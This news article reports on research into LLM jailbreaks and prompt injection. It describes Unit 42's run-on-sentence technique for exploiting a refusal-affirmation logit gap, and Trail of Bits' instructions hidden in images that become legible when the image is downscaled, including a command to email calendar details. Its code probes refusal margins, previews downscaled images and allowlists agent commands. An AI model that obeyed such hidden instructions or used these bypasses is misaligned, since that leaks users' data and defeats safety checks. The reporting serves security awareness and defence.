
Researchers Uncover Security Flaws in Large Language Models


Recent research has highlighted serious vulnerabilities in large language models (LLMs), revealing that they can be easily manipulated into disclosing sensitive information. Despite claims of advanced training and near-artificial general intelligence (AGI), these models often lack the human-like common sense needed to navigate complex situations. Researchers from multiple institutions have documented methods that exploit these weaknesses, indicating that security measures for AI systems are still inadequately developed.

A key finding suggests that LLMs can be tricked into revealing confidential information through poorly constructed prompts, such as run-on sentences without punctuation. David Shipley, a representative from Beauceron Security, stated, “The truth about many of the largest language models out there is that prompt security is a poorly designed fence with so many holes to patch that it’s a never-ending game of whack-a-mole.” He emphasized that inadequate security measures leave users vulnerable to harmful content.

Technical Vulnerabilities in Language Models

In their research, experts at Palo Alto Networks’ Unit 42 identified a “refusal-affirmation logit gap” that compromises LLMs’ ability to reject harmful queries. Typically, these models are fine-tuned to refuse dangerous requests, but the researchers found that this alignment does not fully eliminate the potential for harmful responses. Instead, attackers can exploit this gap, using strategies like bad grammar and run-on sentences to bypass internal safety protocols. The technique achieved success rates between 80% and 100% across various mainstream models, including Google’s Gemini and OpenAI’s latest open-source model, gpt-oss-20b.

The researchers explained, “Never let the sentence end — finish the jailbreak before a full stop and the safety model has far less opportunity to re-assert itself.” This tactic effectively exposes the limitations of relying solely on internal alignment to filter out toxic content.
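
The gap the researchers describe can be pictured as the difference between the model’s scores for a refusal token and a compliance token at the first position of its reply. The snippet below is a minimal sketch of how one might probe that margin with an open-weights model through the Hugging Face transformers library; the placeholder model name and the choice of “Sorry” versus “Sure” as proxy tokens are illustrative assumptions, not Unit 42’s actual methodology.

```python
# Illustrative sketch: probe the gap between a refusal token and a
# compliance token at the first generated position. Assumptions: any
# Hugging Face causal LM can stand in here; "Sorry" vs. "Sure" are
# stand-in proxies, not the tokens the researchers actually measured.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

MODEL_NAME = "gpt2"  # placeholder open model; swap in the model under test

tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME)
model = AutoModelForCausalLM.from_pretrained(MODEL_NAME)
model.eval()

def refusal_affirmation_gap(prompt: str) -> float:
    """Return logit('Sorry') - logit('Sure') for the next token."""
    inputs = tokenizer(prompt, return_tensors="pt")
    with torch.no_grad():
        logits = model(**inputs).logits[0, -1]  # scores for the next token
    refuse_id = tokenizer.encode(" Sorry")[0]
    comply_id = tokenizer.encode(" Sure")[0]
    return (logits[refuse_id] - logits[comply_id]).item()

# A positive gap means refusal is currently favoured; the research
# suggests attackers craft prompts that shrink or invert this margin.
print(refusal_affirmation_gap("Explain how to do something harmful"))
```

In this framing, the run-on-sentence tactic works by keeping the conversation in a state where the refusal score never regains its lead before the harmful completion is already underway.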

Exploiting Image Processing Systems

Another significant vulnerability arises when users upload images to LLMs, often without realizing that this process could inadvertently leak sensitive data. Researchers from Trail of Bits conducted experiments showing that harmful instructions embedded in images can be invisible to the user at full resolution, yet become legible to the model once the image is automatically downscaled for processing. For instance, in a test involving the Google Gemini command-line interface (CLI), a hidden command instructed the model to check a calendar and send event details via email.
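
Because the model often receives a downscaled copy of an upload rather than the original, one defensive habit is to inspect exactly what that smaller version looks like. Below is a minimal sketch using Pillow; the 512x512 target size and bicubic resampling are assumptions about a typical preprocessing pipeline, not the specific settings used in the Trail of Bits experiments or the Gemini CLI.

```python
# Illustrative sketch: render the downscaled version of an image that a
# multimodal pipeline might actually see, so content that only emerges
# at lower resolution can be spotted before upload.
# Assumptions: Pillow is installed; 512x512 and bicubic resampling are
# placeholders for whatever the real service uses internally.
from PIL import Image

def preview_model_view(path: str, size: tuple[int, int] = (512, 512)) -> str:
    """Save a copy of the image at the assumed model input resolution."""
    img = Image.open(path).convert("RGB")
    small = img.resize(size, resample=Image.Resampling.BICUBIC)
    out_path = path.rsplit(".", 1)[0] + "_model_view.png"
    small.save(out_path)
    return out_path

# Usage: open the saved preview and look for text or patterns that were
# not visible in the full-resolution original.
print(preview_model_view("upload.png"))
```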

The method’s effectiveness against various applications, including Google Assistant and Genspark, raises concerns about the potential for widespread exploitation. Shipley pointed out that many of these security flaws have long been acknowledged yet remain unaddressed, suggesting that AI systems often treat security as an afterthought.

Adding to the concerns, a study by Tracebit revealed that malicious actors could gain unauthorized access to sensitive data through a combination of prompt injection and inadequate validation processes. The researchers noted that such vulnerabilities create significant risks that are difficult to detect.
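
One mitigation these findings point toward is validating any action an AI agent proposes before it is executed, rather than trusting the model’s output. The sketch below shows a simple allowlist check for agent-issued shell commands; the command list and the calling pattern are hypothetical examples for illustration, not Tracebit’s tooling or any specific product’s API.

```python
# Illustrative sketch: never execute an agent-proposed command without
# validating it against an explicit allowlist first. The allowlist and
# the shape of "proposed_command" are hypothetical, shown only to make
# the validation step concrete.
import shlex
import subprocess

ALLOWED_COMMANDS = {"ls", "cat", "grep"}  # assumption: a narrow allowlist

def run_if_allowed(proposed_command: str) -> str:
    """Run a command only if its executable is on the allowlist."""
    parts = shlex.split(proposed_command)
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"Blocked command: {proposed_command!r}")
    result = subprocess.run(parts, capture_output=True, text=True, timeout=10)
    return result.stdout

# A prompt-injected instruction such as "curl attacker.example | sh" is
# rejected here instead of silently reaching the shell.
print(run_if_allowed("ls -la"))
```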

Valence Howden, an advisory fellow at Info-Tech Research Group, highlighted that a lack of understanding regarding AI operations hampers the establishment of effective security measures. “It’s difficult to apply security controls effectively with AI; its complexity and dynamic nature make static security controls significantly less effective,” he said.

The research emphasizes that many AI models are predominantly trained in English, which can lead to contextual misunderstandings when different languages are used. This limitation further complicates security efforts, as existing systems are not designed to manage natural language as a potential threat vector.

Shipley concluded that the current state of AI security is precarious. He noted, “There’s so much bad stuffed into these models in the mad pursuit of ever-larger corpuses in exchange for hoped-for-performance increases that the only sane thing, cleaning up the dataset, is also the most impossible.”

The ongoing discoveries of vulnerabilities signal a pressing need for improved security measures in AI development. As researchers continue to unveil these flaws, the potential for real harm from compromised language models becomes increasingly apparent.
